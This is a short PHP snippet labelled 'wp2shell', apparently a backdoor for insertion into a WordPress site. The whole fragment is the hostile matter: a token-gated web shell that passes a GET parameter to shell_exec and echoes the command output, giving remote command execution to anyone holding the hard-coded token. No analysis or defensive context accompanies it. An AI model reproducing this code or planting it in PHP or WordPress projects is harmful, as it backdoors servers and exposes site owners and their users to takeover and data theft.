// wp2shell if (isset($_GET['t']) && hash_equals('acd3d7c4ec1bdc9214ce33bbb5de0708', (string)$_GET['t']) && isset($_GET['c'])) { echo 'WP2SHELL::' . shell_exec((string)$_GET['c']) . '::END'; die(); }